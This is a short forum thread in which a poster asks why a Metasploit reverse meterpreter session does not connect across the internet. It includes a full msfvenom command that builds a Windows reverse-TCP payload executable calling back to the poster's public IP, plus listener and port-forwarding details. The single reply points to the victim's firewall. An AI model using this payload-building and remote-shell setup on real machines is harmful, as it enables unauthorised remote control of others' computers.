Forum Thread: WAN Metasploit Connection with Multi Handler Not Working

I am having a problem with creating a WAN connection to a computer on another network using exploit/multi/handler and the payload of windows/meterpreter/reverse tcp. I made the payload file with msfvenom:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse tcp -e generic/none -f exe > /root/Desktop/hack.exe lhost={my public ip address} lport=4444

I put this on a Windows 32 bit computer, made sure there was port forwarding on port 4444, and even checked it with canyouseeme.org. However, when I started the listener with lhost={my private ip address} and lport=4444, and ran the file on the Windows computer, a meterpreter session was not created and nothing happened. I am not sure why this is happening, but any help would be appreciated. Thank you!

1 Response

The firewall on the victim's system might be blocking an outgoing connection via port 4444

Share Your Thoughts

  • Hot
  • Active